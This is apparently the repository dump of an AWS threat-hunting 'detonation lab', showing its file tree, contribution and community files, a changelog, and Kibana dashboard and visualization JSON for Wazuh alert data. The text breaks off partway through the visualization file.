├── .github ├── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md └── PULL_REQUEST_TEMPLATE.md ├── .gitignore ├── CHANGELOG.md ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── KibanaAdditionalConfigs ├── Kibana-Dashboard.json └── Kibana-Visualizations.json ├── LICENSE ├── README.md ├── SANs_ThreatHuntingSummit-Powerpoint └── Storm-Troopers-ThreatHuntingInTheClouds.pdf ├── ThreatHuntingGuides └── README.md ├── Wazuh-configurations ├── runOnAWSCLIHost │ └── awsCLI-wazuh-configuration-cloudTrail.sh └── runOnWazuh │ └── server-wazuh-configuration-cloudTrail.sh ├── additionalInstallationScripts ├── bastion_bootstrap.sh ├── cloudwatchAgentLogs.ps1 ├── cloudwatchAgentLogs.sh ├── installWazuh.sh ├── installWazuhAgent.ps1 ├── installWazuhAgent.sh └── setupVunlerableWebServer.sh ├── artifacts ├── banner_message.txt ├── never_used_sample_key.foo ├── password_list.txt └── queries.txt ├── attacks ├── README.md └── guardduty_tester.sh ├── awsDetonationLab.template └── images ├── RoyalTSX-Config ├── 1-RoyalTSX-requiredDocument.png ├── 2-RDP-connnectionSettings.png ├── 3-RDP-credentials.png ├── 4-RDP-secureGateway.png ├── 5-bastion- credential.png ├── 6-bastion-key.png ├── 7-secureGateway-config.png └── 8-secureGateway-credentials.png ├── Topology ├── Topology-All.png ├── Topology-IAM.png ├── Topology-Inspector.png ├── Topology-cloudTrail.png ├── Topology-guardduty.png ├── Topology-macie.png ├── Topology-vpcflow.png └── Topology-wazuh.png ├── detonationLab-created.png └── guardDutyFindings-example.png /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | 5 | --- 6 | 7 | **Describe the bug** 8 | A clear and concise description of what the bug is. 9 | 10 | **To Reproduce** 11 | Steps to reproduce the behavior: 12 | 1. Go to '...' 13 | 2. Click on '....' 14 | 3. Scroll down to '....' 15 | 4. See error 16 | 17 | **Expected behavior** 18 | A clear and concise description of what you expected to happen. 19 | 20 | **Screenshots** 21 | If applicable, add screenshots to help explain your problem. 22 | 23 | **Desktop (please complete the following information):** 24 | - OS: [e.g. iOS] 25 | - Browser [e.g. chrome, safari] 26 | - Version [e.g. 22] 27 | 28 | **Smartphone (please complete the following information):** 29 | - Device: [e.g. iPhone6] 30 | - OS: [e.g. iOS8.1] 31 | - Browser [e.g. stock browser, safari] 32 | - Version [e.g. 22] 33 | 34 | **Additional context** 35 | Add any other context about the problem here. 36 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | 5 | --- 6 | 7 | **Is your feature request related to a problem? Please describe.** 8 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 9 | 10 | **Describe the solution you'd like** 11 | A clear and concise description of what you want to happen. 12 | 13 | **Describe alternatives you've considered** 14 | A clear and concise description of any alternative solutions or features you've considered. 15 | 16 | **Additional context** 17 | Add any other context or screenshots about the feature request here. 18 | -------------------------------------------------------------------------------- /.github/PULL_REQUEST_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | *Issue #, if available:* 2 | 3 | *Description of changes:* 4 | 5 | 6 | By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license. 7 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # pyenv 86 | # For a library or package, you might want to ignore these files since the code is 87 | # intended to run in multiple environments; otherwise, check them in: 88 | # .python-version 89 | 90 | # pipenv 91 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 92 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 93 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 94 | # install all needed dependencies. 95 | #Pipfile.lock 96 | 97 | # poetry 98 | # Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control. 99 | # This is especially recommended for binary packages to ensure reproducibility, and is more 100 | # commonly ignored for libraries. 101 | # https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control 102 | #poetry.lock 103 | 104 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 105 | __pypackages__/ 106 | 107 | # Celery stuff 108 | celerybeat-schedule 109 | celerybeat.pid 110 | 111 | # SageMath parsed files 112 | *.sage.py 113 | 114 | # Environments 115 | .env 116 | .venv 117 | env/ 118 | venv/ 119 | ENV/ 120 | env.bak/ 121 | venv.bak/ 122 | 123 | # Spyder project settings 124 | .spyderproject 125 | .spyproject 126 | 127 | # Rope project settings 128 | .ropeproject 129 | 130 | # mkdocs documentation 131 | /site 132 | 133 | # mypy 134 | .mypy_cache/ 135 | .dmypy.json 136 | dmypy.json 137 | 138 | # Pyre type checker 139 | .pyre/ 140 | 141 | # pytype static type analyzer 142 | .pytype/ 143 | 144 | # Cython debug symbols 145 | cython_debug/ 146 | 147 | # PyCharm 148 | # JetBrains specific template is maintained in a separate JetBrains.gitignore that can 149 | # be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore 150 | # and can be added to the global gitignore or merged into this file. For a more nuclear 151 | # option (not recommended) you can uncomment the following to ignore the entire idea folder. 152 | #.idea/ -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | 3 | ## v2.2 4 | ### Changed 5 | * Inspector logs are fetched directly from the AWS API instead of being fetched from an S3 bucket. 6 | 7 | ## v2.1 8 | ### Added 9 | * Automate setting `wazuh-alerts-3.x-*` as Kibana's default index pattern ([#64](https://github.com/sonofagl1tch/AWSDetonationLab/pull/64/)). 10 | * Automate import of custom dashboards and visualizations into Kibana ([#68](https://github.com/sonofagl1tch/AWSDetonationLab/pull/68/)). 11 | 12 | ### Fixed 13 | * Retrieve AMI IDs dynamically instead of having hardcoded values ([#66](https://github.com/sonofagl1tch/AWSDetonationLab/pull/66)). 14 | 15 | ## v2.0 16 | ### Added 17 | * Added `apache` user to `wheel` group in Linux vulnerable server ([#20](https://github.com/sonofagl1tch/AWSDetonationLab/pull/20)). 18 | * Added parameters in CF script to select instance type ([#27](https://github.com/sonofagl1tch/AWSDetonationLab/pull/27), [#31](https://github.com/sonofagl1tch/AWSDetonationLab/pull/31) and [#34](https://github.com/sonofagl1tch/AWSDetonationLab/pull/34)). 19 | * Allow deploying multiple detonation labs in the same account by using randomly generated names ([#33](https://github.com/sonofagl1tch/AWSDetonationLab/pull/33)). 20 | * Install Wazuh agent in both bastion and red team instances ([#47](https://github.com/sonofagl1tch/AWSDetonationLab/pull/47)). 21 | * Add support for Wazuh's VirusTotal integration ([#58](https://github.com/sonofagl1tch/AWSDetonationLab/pull/58)). 22 | 23 | ### Fixed 24 | * Additional Wazuh configuration is appended to the default one instead of rewriting all Wazuh configuration ([#26](https://github.com/sonofagl1tch/AWSDetonationLab/pull/26) and [#35](https://github.com/sonofagl1tch/AWSDetonationLab/pull/35)). 25 | * Fixed typo in CF script: _firehost_ to _firehose_ ([#37](https://github.com/sonofagl1tch/AWSDetonationLab/pull/37)). 26 | * Fixed bug replacing AWS secret key in Wazuh configuration ([#62](https://github.com/sonofagl1tch/AWSDetonationLab/pull/62)). 27 | 28 | ### Changed 29 | * Wazuh agents registration using `authd` service ([#19](https://github.com/sonofagl1tch/AWSDetonationLab/pull/19) and [#39](https://github.com/sonofagl1tch/AWSDetonationLab/pull/39)) 30 | * AMI images has been updated to `amzn-ami-hvm-2018.03.0.20181119-x86_64-gp2` and `Windows_Server-2012-R2_RTM-English-64Bit-Base-2018.10.14` ([#52](https://github.com/sonofagl1tch/AWSDetonationLab/pull/52)). 31 | * Update Java download script ([#43](https://github.com/sonofagl1tch/AWSDetonationLab/pull/43)). 32 | * Implemented new method of logging VPC Flow directly to S3 without lambda function ([#21](https://github.com/sonofagl1tch/AWSDetonationLab/pull/21)). 33 | 34 | ### Removed 35 | * Removed unnecessary open ports and security group settings for Wazuh agents ([#38](https://github.com/sonofagl1tch/AWSDetonationLab/pull/38)). 36 | * Removed installation of Python Pip in the Wazuh manager ([#57](https://github.com/sonofagl1tch/AWSDetonationLab/pull/57)). 37 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. 6 | 7 | ## Our Standards 8 | 9 | Examples of behavior that contributes to creating a positive environment include: 10 | 11 | * Using welcoming and inclusive language 12 | * Being respectful of differing viewpoints and experiences 13 | * Gracefully accepting constructive criticism 14 | * Focusing on what is best for the community 15 | * Showing empathy towards other community members 16 | 17 | Examples of unacceptable behavior by participants include: 18 | 19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances 20 | * Trolling, insulting/derogatory comments, and personal or political attacks 21 | * Public or private harassment 22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission 23 | * Other conduct which could reasonably be considered inappropriate in a professional setting 24 | 25 | ## Our Responsibilities 26 | 27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. 28 | 29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. 30 | 31 | ## Scope 32 | 33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 34 | 35 | ## Enforcement 36 | 37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at nolette.ryan@gmail.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. 38 | 39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. 40 | 41 | ## Attribution 42 | 43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] 44 | 45 | [homepage]: http://contributor-covenant.org 46 | [version]: http://contributor-covenant.org/version/1/4/ 47 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing Guidelines 2 | 3 | Thank you for your interest in contributing to our project. Whether it's a bug report, new feature, correction, or additional 4 | documentation, we greatly value feedback and contributions from our community. 5 | 6 | Please read through this document before submitting any issues or pull requests to ensure we have all the necessary 7 | information to effectively respond to your bug report or contribution. 8 | 9 | 10 | ## Reporting Bugs/Feature Requests 11 | 12 | We welcome you to use the GitHub issue tracker to report bugs or suggest features. 13 | 14 | When filing an issue, please check [existing open](https://github.com/awslabs/amazon-guardduty-tester/issues), or [recently closed](https://github.com/awslabs/amazon-guardduty-tester/issues?utf8=%E2%9C%93&q=is%3Aissue%20is%3Aclosed%20), issues to make sure somebody else hasn't already 15 | reported the issue. Please try to include as much information as you can. Details like these are incredibly useful: 16 | 17 | * A reproducible test case or series of steps 18 | * The version of our code being used 19 | * Any modifications you've made relevant to the bug 20 | * Anything unusual about your environment or deployment 21 | 22 | 23 | ## Contributing via Pull Requests 24 | Contributions via pull requests are much appreciated. Before sending us a pull request, please ensure that: 25 | 26 | 1. You are working against the latest source on the *master* branch. 27 | 2. You check existing open, and recently merged, pull requests to make sure someone else hasn't addressed the problem already. 28 | 3. You open an issue to discuss any significant work - we would hate for your time to be wasted. 29 | 30 | To send us a pull request, please: 31 | 32 | 1. Fork the repository. 33 | 2. Modify the source; please focus on the specific change you are contributing. If you also reformat all the code, it will be hard for us to focus on your change. 34 | 3. Ensure local tests pass. 35 | 4. Commit to your fork using clear commit messages. 36 | 5. Send us a pull request, answering any default questions in the pull request interface. 37 | 6. Pay attention to any automated CI failures reported in the pull request, and stay involved in the conversation. 38 | 39 | GitHub provides additional document on [forking a repository](https://help.github.com/articles/fork-a-repo/) and 40 | [creating a pull request](https://help.github.com/articles/creating-a-pull-request/). 41 | 42 | 43 | ## Finding contributions to work on 44 | Looking at the existing issues is a great way to find something to contribute on. As our projects, by default, use the default GitHub issue labels ((enhancement/bug/duplicate/help wanted/invalid/question/wontfix), looking at any ['help wanted'](https://github.com/awslabs/amazon-guardduty-tester/labels/help%20wanted) issues is a great place to start. 45 | 46 | 47 | ## Code of Conduct 48 | This project has adopted the [Amazon Open Source Code of Conduct](https://aws.github.io/code-of-conduct). 49 | For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq) or contact 50 | opensource-codeofconduct@amazon.com with any additional questions or comments. 51 | 52 | 53 | ## Security issue notifications 54 | If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/). Please do **not** create a public github issue. 55 | 56 | 57 | ## Licensing 58 | 59 | See the [LICENSE](https://github.com/awslabs/amazon-guardduty-tester/blob/master/LICENSE) file for our project's licensing. We will ask you to confirm the licensing of your contribution. 60 | 61 | We may ask you to sign a [Contributor License Agreement (CLA)](http://en.wikipedia.org/wiki/Contributor_License_Agreement) for larger changes. 62 | -------------------------------------------------------------------------------- /KibanaAdditionalConfigs/Kibana-Dashboard.json: -------------------------------------------------------------------------------- 1 | { 2 | "objects": [ 3 | { 4 | "id": "6bec8300-a4b8-11e8-846b-5b38848342c8", 5 | "type": "dashboard", 6 | "attributes": { 7 | "title": "AWS-Logging", 8 | "hits": 0, 9 | "description": "", 10 | "panelsJSON": "[{\"panelIndex\":\"1\",\"gridData\":{\"x\":0,\"y\":0,\"w\":24,\"h\":15,\"i\":\"1\"},\"embeddableConfig\":{},\"id\":\"5ac185d0-a4b8-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"2\",\"gridData\":{\"x\":24,\"y\":0,\"w\":24,\"h\":15,\"i\":\"2\"},\"embeddableConfig\":{},\"id\":\"864e9ef0-a4b7-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"3\",\"gridData\":{\"x\":0,\"y\":15,\"w\":24,\"h\":15,\"i\":\"3\"},\"embeddableConfig\":{},\"id\":\"804781a0-a540-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"4\",\"gridData\":{\"x\":24,\"y\":15,\"w\":24,\"h\":15,\"i\":\"4\"},\"embeddableConfig\":{},\"id\":\"23862010-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"5\",\"gridData\":{\"x\":0,\"y\":30,\"w\":24,\"h\":15,\"i\":\"5\"},\"embeddableConfig\":{},\"id\":\"cb77bf40-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"6\",\"gridData\":{\"x\":24,\"y\":30,\"w\":24,\"h\":15,\"i\":\"6\"},\"embeddableConfig\":{},\"id\":\"3dd5d000-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"7\",\"gridData\":{\"x\":0,\"y\":45,\"w\":24,\"h\":15,\"i\":\"7\"},\"embeddableConfig\":{},\"id\":\"b4f2abe0-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"8\",\"gridData\":{\"x\":24,\"y\":60,\"w\":24,\"h\":15,\"i\":\"8\"},\"embeddableConfig\":{},\"id\":\"cf4ecc00-a54e-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"9\",\"gridData\":{\"x\":24,\"y\":45,\"w\":24,\"h\":15,\"i\":\"9\"},\"embeddableConfig\":{},\"id\":\"47bf70b0-a552-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"10\",\"gridData\":{\"x\":24,\"y\":75,\"w\":24,\"h\":15,\"i\":\"10\"},\"embeddableConfig\":{},\"id\":\"20b982d0-a552-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"11\",\"gridData\":{\"x\":0,\"y\":75,\"w\":24,\"h\":15,\"i\":\"11\"},\"embeddableConfig\":{},\"id\":\"b4666910-a54f-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"12\",\"gridData\":{\"x\":24,\"y\":90,\"w\":24,\"h\":15,\"i\":\"12\"},\"embeddableConfig\":{},\"id\":\"70762330-a54f-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"13\",\"gridData\":{\"x\":0,\"y\":90,\"w\":24,\"h\":15,\"i\":\"13\"},\"embeddableConfig\":{},\"id\":\"1298fbf0-a551-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"14\",\"gridData\":{\"x\":0,\"y\":60,\"w\":24,\"h\":15,\"i\":\"14\"},\"version\":\"6.3.2\",\"type\":\"visualization\",\"id\":\"39aabda0-a6e6-11e8-89d6-8101ba40c8df\",\"embeddableConfig\":{}},{\"panelIndex\":\"15\",\"gridData\":{\"x\":0,\"y\":105,\"w\":24,\"h\":15,\"i\":\"15\"},\"version\":\"6.3.2\",\"type\":\"visualization\",\"id\":\"90d5fd80-a6fd-11e8-89d6-8101ba40c8df\",\"embeddableConfig\":{}}]", 11 | "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", 12 | "version": 1, 13 | "timeRestore": false, 14 | "kibanaSavedObjectMeta": { 15 | "searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"highlightAll\":true,\"version\":true}" 16 | } 17 | } 18 | } 19 | ] 20 | } -------------------------------------------------------------------------------- /KibanaAdditionalConfigs/Kibana-Visualizations.json: -------------------------------------------------------------------------------- 1 | { 2 | "objects": 3 | [ 4 | { 5 | "id": "23862010-a541-11e8-846b-5b38848342c8", 6 | "type": "visualization", 7 | "attributes": { 8 | "title": "VPCFlow-Top10ExternalDestinationIP-Table", 9 | "visState": "{\"title\":\"VPCFlow-Top10ExternalDestinationIP-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstaddr\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 External Destination IP\"}}]}", 10 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 11 | "description": "", 12 | "version": 1, 13 | "kibanaSavedObjectMeta": { 14 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"-data.aws.dstaddr: \\\"10.0.0.0/4\\\" AND -data.aws.dstaddr: \\\"172.16.0.0/12\\\" AND -data.aws.dstaddr: \\\"192.168.0.0/16\\\"\",\"language\":\"lucene\"}}" 15 | } 16 | } 17 | }, 18 | { 19 | "id": "39aabda0-a6e6-11e8-89d6-8101ba40c8df", 20 | "type": "visualization", 21 | "attributes": { 22 | "title": "VPCFlow-Top10TransferSizesForExternalDestinationIP-Table", 23 | "visState": "{\"title\":\"VPCFlow-Top10TransferSizesForExternalDestinationIP-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"top_hits\",\"schema\":\"metric\",\"params\":{\"field\":\"data.aws.bytes\",\"aggregate\":\"max\",\"size\":10,\"sortField\":\"@timestamp\",\"sortOrder\":\"desc\",\"customLabel\":\"Bytes Sent\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstaddr\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"_term\",\"customLabel\":\"Destination IP\"}}]}", 24 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"}}}}", 25 | "description": "", 26 | "version": 1, 27 | "kibanaSavedObjectMeta": { 28 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source:vpc AND NOT data.aws.dstaddr:\\\"10.0.0.0/4\\\" AND NOT data.aws.dstaddr:\\\"172.16.0.0/12\\\" AND NOT data.aws.dstaddr:\\\"192.168.0.0/16\\\"\",\"language\":\"kuery\"}}" 29 | } 30 | } 31 | }, 32 | { 33 | "id": "3dd5d000-a541-11e8-846b-5b38848342c8", 34 | "type": "visualization", 35 | "attributes": { 36 | "title": "VPCFlow-Top10InternalDestinationIP-Table", 37 | "visState": "{\"title\":\"VPCFlow-Top10InternalDestinationIP-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstaddr\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 Interal Destination IP\"}}]}", 38 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 39 | "description": "", 40 | "version": 1, 41 | "kibanaSavedObjectMeta": { 42 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.dstaddr: \\\"10.0.0.0/4\\\" OR data.aws.dstaddr: \\\"172.16.0.0/12\\\" OR data.aws.dstaddr: \\\"192.168.0.0/16\\\"\",\"language\":\"lucene\"}}" 43 | } 44 | } 45 | }, 46 | { 47 | "id": "20b982d0-a552-11e8-846b-5b38848342c8", 48 | "type": "visualization", 49 | "attributes": { 50 | "title": "VPCFlow-ProtocolBreakdown-Pie", 51 | "visState": "{\"title\":\"VPCFlow-ProtocolBreakdown-Pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.protocol\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"VPCFlow Protocols\"}}]}", 52 | "uiStateJSON": "{}", 53 | "description": "", 54 | "version": 1, 55 | "kibanaSavedObjectMeta": { 56 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source : \\\"vpc\\\"\",\"language\":\"kuery\"}}" 57 | } 58 | } 59 | }, 60 | { 61 | "id": "5ac185d0-a4b8-11e8-846b-5b38848342c8", 62 | "type": "visualization", 63 | "attributes": { 64 | "title": "AWS-LoggingSources", 65 | "visState": "{\"title\":\"AWS-LoggingSources\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.source\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"AWSLoggingSources\"}}]}", 66 | "uiStateJSON": "{}", 67 | "description": "", 68 | "version": 1, 69 | "kibanaSavedObjectMeta": { 70 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"lucene\"}}" 71 | } 72 | } 73 | }, 74 | { 75 | "id": "1298fbf0-a551-11e8-846b-5b38848342c8", 76 | "type": "visualization", 77 | "attributes": { 78 | "title": "GuardDuty-BreakdownOfAlertsPerInstancePerVPC-Pie", 79 | "visState": "{\"title\":\"GuardDuty-BreakdownOfAlertsPerInstancePerVPC-Pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count of Instances In VPC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"split\",\"params\":{\"field\":\"data.aws.resource.instanceDetails.networkInterfaces.vpcId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":100,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"VPCID\",\"row\":true}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.resource.instanceDetails.instanceId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":100,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"InstanceID\"}}]}", 80 | "uiStateJSON": "{}", 81 | "description": "", 82 | "version": 1, 83 | "kibanaSavedObjectMeta": { 84 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source:guardduty\",\"language\":\"kuery\"}}" 85 | } 86 | } 87 | }, 88 | { 89 | "id": "804781a0-a540-11e8-846b-5b38848342c8", 90 | "type": "visualization", 91 | "attributes": { 92 | "title": "VPCFlow-SumOfBytesOverTime-histogram", 93 | "visState": 